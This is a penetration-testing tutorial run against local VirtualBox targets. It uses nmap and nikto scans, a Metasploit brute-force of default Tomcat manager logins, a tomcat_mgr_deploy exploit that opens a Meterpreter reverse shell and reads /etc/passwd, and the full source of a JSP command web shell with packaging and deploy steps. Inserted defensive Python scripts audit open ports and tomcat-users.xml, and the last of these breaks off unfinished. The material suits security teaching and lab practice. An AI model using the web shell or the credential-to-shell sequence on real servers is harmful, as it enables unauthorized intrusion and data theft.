This tutorial outlines many of the security flaws on both OS machines, such as:

Gathering information

Identify open network services

Exploit vulnerable services

(Note: For the purpose of this tutorial, BackBox (based on Ubuntu) is used as the attacking OS, together with the latest installation package of Oracle VM VirtualBox and Ubuntu 9.04 / Windows XP SP2 as the target OSes.)

Setting Up VM – Manual ifconfig

Before starting our penetration testing on the VMs, we'll set up and configure a couple of things on the VM machines. After we have created our OS machines (both Ubuntu and Windows), click the "Settings" button and navigate to the "Network" tab once more. For the network interface, choose "Host-only Adapter"; the vboxnet0 option will be selected automatically.

Next we'll set up the eth0 interface for the Ubuntu OS. In the terminal type:

[c]
ifconfig eth0 192.168.56.102 netmask 255.255.255.0 up
[/c]

If you would like the network information statically assigned without having to enter it manually each time, you can edit the /etc/network/interfaces file for the appropriate Ethernet device:

[c]
# The host-only network interface
auto eth0
iface eth0 inet static
address 192.168.56.102
netmask 255.255.255.0
network 192.168.56.0
broadcast 192.168.56.255
[/c]

(Note: Be sure to restart the network service after modifying this file: /etc/init.d/networking restart.)

Next you will set up the Windows network interface. In the Start menu's Run dialog type cmd and click "OK".

Then navigate to the Network Connections panel.

Next, in the properties panel choose "Internet Protocol (TCP/IP)" and click "Properties". On the "General" tab choose "Use the following IP address" and add the appropriate network information (in this tutorial the Windows VM uses 192.168.56.103 with netmask 255.255.255.0).

Next, at the command prompt, run the following command to verify the adapter settings:

[c]
ipconfig /all
[/c]

Verifying connectivity

We will attempt to ping the machines to verify connectivity. If everything is configured correctly, you should see output along the lines of the following:

Ubuntu machine:

[c]
root@wizard32:~# ping 192.168.56.102
PING 192.168.56.102 (192.168.56.102) 56(84) bytes of data.
64 bytes from 192.168.56.102: icmp_req=1 ttl=64 time=0.302 ms
64 bytes from 192.168.56.102: icmp_req=2 ttl=64 time=0.754 ms
^C
--- 192.168.56.102 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.302/0.528/0.754/0.226 ms
[/c]

And:

[c]
root@ubuntu:~$ ping 192.168.56.1
PING 192.168.56.1 (192.168.56.1) 56(84) bytes of data.
64 bytes from 192.168.56.1: icmp_req=1 ttl=64 time=0.251 ms
64 bytes from 192.168.56.1: icmp_req=2 ttl=64 time=0.306 ms
^C
--- 192.168.56.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 0.251/0.278/0.306/0.032 ms
[/c]

Windows machine:

[c]
root@wizard32:~# ping 192.168.56.103
PING 192.168.56.103 (192.168.56.103) 56(84) bytes of data.
64 bytes from 192.168.56.103: icmp_req=1 ttl=128 time=0.536 ms
64 bytes from 192.168.56.103: icmp_req=2 ttl=128 time=0.574 ms
^C
--- 192.168.56.103 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 0.536/0.555/0.574/0.019 ms
[/c]

And:

[c]
C:\Documents and Settings\windowsxp>ping 192.168.56.1

Pinging 192.168.56.1 with 32 bytes of data:

Reply from 192.168.56.1: bytes=32 time<1ms TTL=64
Reply from 192.168.56.1: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.56.1:
    Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
[/c]

Gathering Information – Ubuntu Machine

We'll begin by trying some basic scans against our VM (Ubuntu) machine at 192.168.56.102. Here we perform a simple scan to determine which ports are open on the target system using the -p option (-p- scans the full TCP port range).

[c]
root@wizard32:~# nmap -p- 192.168.56.102

Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 13:54 EEST
Nmap scan report for 192.168.56.102
Host is up (0.00020s latency).
Not shown: 65522 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
3632/tcp open  distccd
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 08:00:27:08:F3:66 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 14.39 seconds
[/c]

Looking at the results, we can see that many ports are open. So let's use another tool to learn a little more about the service on port 8180.

[c]
root@wizard32:~# nikto -h 192.168.56.102 -p 8180
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          192.168.56.102
+ Target Hostname:    192.168.56.102
+ Target Port:        8180
+ Start Time:         2013-06-19 14:04:00
---------------------------------------------------------------------------
+ Server: Apache-Coyote/1.1
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-39272: /favicon.ico file identifies this server as: Apache Tomcat
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ /: Appears to be a default Apache Tomcat install.
+ OSVDB-376: /admin/contextAdmin/contextAdmin.html: Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found.
+ OSVDB-3233: /manager/html-manager-howto.html: Tomcat documentation found.
+ OSVDB-3233: /manager/manager-howto.html: Tomcat documentation found.
+ OSVDB-3092: /webdav/index.html: WebDAV support is enabled.
+ OSVDB-3233: /jsp-examples/: Apache Java Server Pages documentation.
+ /admin/account.html: Admin login page/section found.
+ /admin/controlpanel.html: Admin login page/section found.
+ /admin/cp.html: Admin login page/section found.
+ /admin/index.html: Admin login page/section found.
+ /admin/login.html: Admin login page/section found.
+ /servlets-examples/: Tomcat servlets examples are visible.
+ 6448 items checked: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2013-06-19 14:05:24 (84 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
[/c]

Exploit Vulnerable Backdoors

Reviewing the output closely, we can see that port 8180/tcp runs an Apache Tomcat server. We can identify the version of the Apache Tomcat server using Metasploit:

[c]
msf > use auxiliary/admin/http/tomcat_administration
msf auxiliary(tomcat_administration) > show options

Module options (auxiliary/admin/http/tomcat_administration):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   Proxies                       no        Use a proxy chain
   RHOSTS                        yes       The target address range or CIDR identifier
   RPORT        8180             yes       The target port
   THREADS      1                yes       The number of concurrent threads
   TOMCAT_PASS                   no        The password for the specified username
   TOMCAT_USER                   no        The username to authenticate as
   VHOST                         no        HTTP server virtual host

msf auxiliary(tomcat_administration) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(tomcat_administration) > run

[*] http://192.168.56.102:8180/admin [Apache-Coyote/1.1] [Apache Tomcat/5.5] [Tomcat Server Administration] [tomcat/tomcat]
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[/c]

As we can see, Apache Tomcat/5.5 is used.
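From the defender's side, the useful question about a scan like the one above is not "what is open?" but "what is open that should not be?". The following script is an added example (not code from the tutorial): it parses nmap's normal "PORT STATE SERVICE" output into records and compares them against an allowlist of the services the asset owner intends to expose. The report text is the tutorial's own nmap result for the Ubuntu VM; the allowlist (SSH and HTTP only) and the list of legacy cleartext protocols are constructed assumptions for the example.

```python
"""Audit an nmap -p- report against a service allowlist.

Added example, not code from the original tutorial. The report text is the
tutorial's own nmap output for the Ubuntu VM; the allowlist of intended
services is a constructed assumption about what this host should expose.
"""
import re
from typing import Dict, List, NamedTuple, Set, Tuple


class OpenPort(NamedTuple):
    port: int
    proto: str
    service: str


# Rows of nmap's "PORT STATE SERVICE" table, e.g. "3632/tcp open  distccd".
_PORT_ROW = re.compile(r"^(\d{1,5})/(tcp|udp)\s+open\s+(\S+)")

# Copy of the scan output shown in the tutorial.
NMAP_REPORT = """\
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-18 13:54 EEST
Nmap scan report for 192.168.56.102
Host is up (0.00020s latency).
Not shown: 65522 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
3632/tcp open  distccd
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 08:00:27:08:F3:66 (Cadmus Computer Systems)

Nmap done: 1 IP address (1 host up) scanned in 14.39 seconds
"""

# Assumption for this example: the owner intends the host to serve only SSH and HTTP.
ALLOWLIST: Set[Tuple[int, str]] = {(22, "tcp"), (80, "tcp")}

# Legacy protocols that carry credentials in the clear (constructed list).
CLEARTEXT_SERVICES: Set[str] = {"ftp", "telnet"}


def parse_open_ports(report: str) -> List[OpenPort]:
    """Return every open-port row of an nmap normal-output report, in scan order."""
    ports: List[OpenPort] = []
    for line in report.splitlines():
        m = _PORT_ROW.match(line.strip())
        if m:
            ports.append(OpenPort(int(m.group(1)), m.group(2), m.group(3)))
    return ports


def unexpected_exposure(ports: List[OpenPort], allowlist: Set[Tuple[int, str]]) -> List[OpenPort]:
    """Open ports that are not on the owner's allowlist."""
    return [p for p in ports if (p.port, p.proto) not in allowlist]


def cleartext_services(ports: List[OpenPort]) -> List[OpenPort]:
    """Open ports whose nmap service name is a known cleartext protocol."""
    return [p for p in ports if p.service in CLEARTEXT_SERVICES]


def audit(report: str, allowlist: Set[Tuple[int, str]]) -> Dict[str, object]:
    """Summarise one host's exposure: total open ports, unexpected ones, cleartext ones."""
    ports = parse_open_ports(report)
    return {
        "open": len(ports),
        "unexpected": unexpected_exposure(ports, allowlist),
        "cleartext": cleartext_services(ports),
    }


if __name__ == "__main__":
    result = audit(NMAP_REPORT, ALLOWLIST)
    print(f"{result['open']} open ports, {len(result['unexpected'])} not on the allowlist:")
    for p in result["unexpected"]:
        flag = "  (cleartext protocol)" if p in result["cleartext"] else ""
        print(f"  {p.port}/{p.proto} {p.service}{flag}")
```

Run against the tutorial's scan, every port except 22 and 80 is reported, including distccd on 3632 and telnet on 23. The same parser works on any nmap normal output, so the allowlist can be kept per host and the diff reviewed after each scheduled scan.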
So once more using Metasploit, we'll try to log in to the Apache Tomcat server with a list of default username/password combinations:

[c]
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.56.102
RHOSTS => 192.168.56.102
msf auxiliary(tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) > run

[*] 192.168.56.102:8180 TOMCAT_MGR - [01/63] - Trying username:'' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [01/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [02/63] - Trying username:'admin' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [02/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [03/63] - Trying username:'manager' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [03/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [04/63] - Trying username:'role1' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [04/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [05/63] - Trying username:'root' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [05/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [06/63] - Trying username:'tomcat' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [06/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 192.168.56.102:8180 TOMCAT_MGR - [07/63] - Trying username:'both' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [07/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [08/63] - Trying username:'j2deployer' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [08/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] 192.168.56.102:8180 TOMCAT_MGR - [09/63] - Trying username:'ovwebusr' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [09/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.56.102:8180 TOMCAT_MGR - [10/63] - Trying username:'cxsdk' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [10/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.56.102:8180 TOMCAT_MGR - [11/63] - Trying username:'ADMIN' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [11/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] 192.168.56.102:8180 TOMCAT_MGR - [12/63] - Trying username:'xampp' with password:''
[-] 192.168.56.102:8180 TOMCAT_MGR - [12/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] 192.168.56.102:8180 TOMCAT_MGR - [13/63] - Trying username:'admin' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [13/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [14/63] - Trying username:'manager' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [14/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [15/63] - Trying username:'role1' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [15/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [16/63] - Trying username:'root' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [16/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [17/63] - Trying username:'tomcat' with password:'tomcat'
[+] http://192.168.56.102:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 192.168.56.102:8180 TOMCAT_MGR - [18/63] - Trying username:'both' with password:'both'
[-] 192.168.56.102:8180 TOMCAT_MGR - [18/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [19/63] - Trying username:'j2deployer' with password:'j2deployer'
[-] 192.168.56.102:8180 TOMCAT_MGR - [19/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] 192.168.56.102:8180 TOMCAT_MGR - [20/63] - Trying username:'ovwebusr' with password:'ovwebusr'
[-] 192.168.56.102:8180 TOMCAT_MGR - [20/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.56.102:8180 TOMCAT_MGR - [21/63] - Trying username:'cxsdk' with password:'cxsdk'
[-] 192.168.56.102:8180 TOMCAT_MGR - [21/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.56.102:8180 TOMCAT_MGR - [22/63] - Trying username:'ADMIN' with password:'ADMIN'
[-] 192.168.56.102:8180 TOMCAT_MGR - [22/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ADMIN'
[*] 192.168.56.102:8180 TOMCAT_MGR - [23/63] - Trying username:'xampp' with password:'xampp'
[-] 192.168.56.102:8180 TOMCAT_MGR - [23/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'xampp'
[*] 192.168.56.102:8180 TOMCAT_MGR - [24/63] - Trying username:'ovwebusr' with password:'OvWbusr1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [24/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.56.102:8180 TOMCAT_MGR - [25/63] - Trying username:'cxsdk' with password:'kdsxc'
[-] 192.168.56.102:8180 TOMCAT_MGR - [25/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
[*] 192.168.56.102:8180 TOMCAT_MGR - [26/63] - Trying username:'root' with password:'owaspbwa'
[-] 192.168.56.102:8180 TOMCAT_MGR - [26/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [27/63] - Trying username:'' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [27/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [28/63] - Trying username:'' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [28/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [29/63] - Trying username:'' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [29/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [30/63] - Trying username:'' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [30/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [31/63] - Trying username:'' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [31/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [32/63] - Trying username:'' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [32/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as ''
[*] 192.168.56.102:8180 TOMCAT_MGR - [33/63] - Trying username:'admin' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [33/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [34/63] - Trying username:'admin' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [34/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [35/63] - Trying username:'admin' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [35/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [36/63] - Trying username:'admin' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [36/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [37/63] - Trying username:'admin' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [37/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'admin'
[*] 192.168.56.102:8180 TOMCAT_MGR - [38/63] - Trying username:'manager' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [38/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [39/63] - Trying username:'manager' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [39/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [40/63] - Trying username:'manager' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [40/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [41/63] - Trying username:'manager' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [41/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [42/63] - Trying username:'manager' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [42/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'manager'
[*] 192.168.56.102:8180 TOMCAT_MGR - [43/63] - Trying username:'role1' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [43/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [44/63] - Trying username:'role1' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [44/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [45/63] - Trying username:'role1' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [45/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [46/63] - Trying username:'role1' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [46/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [47/63] - Trying username:'role1' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [47/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'role1'
[*] 192.168.56.102:8180 TOMCAT_MGR - [48/63] - Trying username:'root' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [48/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [49/63] - Trying username:'root' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [49/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [50/63] - Trying username:'root' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [50/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [51/63] - Trying username:'root' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [51/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [52/63] - Trying username:'root' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [52/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'root'
[*] 192.168.56.102:8180 TOMCAT_MGR - [53/63] - Trying username:'both' with password:'admin'
[-] 192.168.56.102:8180 TOMCAT_MGR - [53/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [54/63] - Trying username:'both' with password:'manager'
[-] 192.168.56.102:8180 TOMCAT_MGR - [54/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [55/63] - Trying username:'both' with password:'role1'
[-] 192.168.56.102:8180 TOMCAT_MGR - [55/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [56/63] - Trying username:'both' with password:'root'
[-] 192.168.56.102:8180 TOMCAT_MGR - [56/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [57/63] - Trying username:'both' with password:'tomcat'
[-] 192.168.56.102:8180 TOMCAT_MGR - [57/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.56.102:8180 TOMCAT_MGR - [58/63] - Trying username:'both' with password:'s3cret'
[-] 192.168.56.102:8180 TOMCAT_MGR - [58/63] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[/c]

Reviewing the result, we can see that the Apache Tomcat server accepts "tomcat" as both username and password. Based on this result, let's exploit it:

[c]
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options

Module options (exploit/multi/http/tomcat_mgr_deploy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   PATH      /manager         yes       The URI path of the manager app (/deploy and /undeploy will be used)
   Proxies                    no        Use a proxy chain
   RHOST                      yes       The target address
   RPORT     80               yes       The target port
   USERNAME                   no        The username to authenticate as
   VHOST                      no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.56.102
RHOST => 192.168.56.102
msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat
USERNAME => tomcat
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
PASSWORD => tomcat
msf exploit(tomcat_mgr_deploy) > set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6471 bytes as DqyPmto6a9UzwBp3l1AUIFIT.war ...
[*] Executing /DqyPmto6a9UzwBp3l1AUIFIT/xl6Pc2XuqQlqxb03Kl4LmxKMbO3p.jsp...
[*] Undeploying DqyPmto6a9UzwBp3l1AUIFIT ...
[*] Sending stage (30246 bytes) to 192.168.56.102
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.102:51208) at 2013-06-18 15:30:53 +0300

meterpreter > getuid
Server username: tomcat55
meterpreter > shell
Process 1 created.
Channel 1 created.
id
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
cd /etc
cat passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
:
:
:
[/c]

Vulnerable Web Service

Open a browser and enter the IP of the VM together with the port of the Apache Tomcat server (IP:Port) in the address field.

Next click "Tomcat Manager" in the Administration panel on the left and enter "tomcat" as both username and password.

Next we'll create and upload a .war file containing a JSP command shell, which will let us execute commands on the server. So create a cmd_shell.jsp file containing the following code:

[js]
<%@ page import="java.util.*,java.io.*"%>
<%
%>
<HTML><BODY>
<H3>JSP Shell</H3>
Note: Against Windows you may need to prefix your command with cmd.exe /c
<FORM METHOD="GET" NAME="myform" ACTION="">
JSP Command: <INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>
</pre>
</BODY></HTML>
[/js]

Then package the file using the jar command as follows:

[c]
jar -cvf cmd.war cmd_shell.jsp
[/c]

(Note: .war is the file format the Apache Tomcat Manager accepts for deployment.)

Next browse to the .war file and deploy it. As we can see, the /cmd path was added.

Click this path and then, in the address bar, complete the path by adding cmd_shell.jsp:

At this point we can type any Unix/Windows command, as if we were sitting at a command prompt on the server.
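The root cause of everything in this Tomcat section is one line in tomcat-users.xml: an account with a default password that also holds the manager role. The following script is an added example (not code from the tutorial or from Apache Tomcat) that audits such a file. The XML is a constructed sample modelled on the Tomcat 5.5 defaults, with the tomcat/tomcat manager account the tutorial logged in with; the "deployer" account is a constructed placeholder for a properly configured user. The password list is the set the tutorial's tomcat_mgr_login run cycled through, taken from its output above.

```python
"""Audit a Tomcat tomcat-users.xml for default credentials on privileged roles.

Added example, not code from the original tutorial or from Apache Tomcat. The
XML is a constructed sample modelled on the Tomcat 5.5 default file; the
"deployer" user is a constructed placeholder for a correctly configured account.
"""
import xml.etree.ElementTree as ET
from typing import List, NamedTuple, Set

# Constructed sample; not copied from any real installation.
SAMPLE_TOMCAT_USERS = """\
<tomcat-users>
  <role rolename="tomcat"/>
  <role rolename="role1"/>
  <role rolename="manager"/>
  <role rolename="admin"/>
  <user username="tomcat" password="tomcat" roles="tomcat,manager,admin"/>
  <user username="both" password="tomcat" roles="tomcat,role1"/>
  <user username="role1" password="tomcat" roles="role1"/>
  <user username="deployer" password="Vq7!rT2m#pLx9Kd" roles="manager"/>
</tomcat-users>
"""

# Passwords the tutorial's tomcat_mgr_login run tried (taken from its output).
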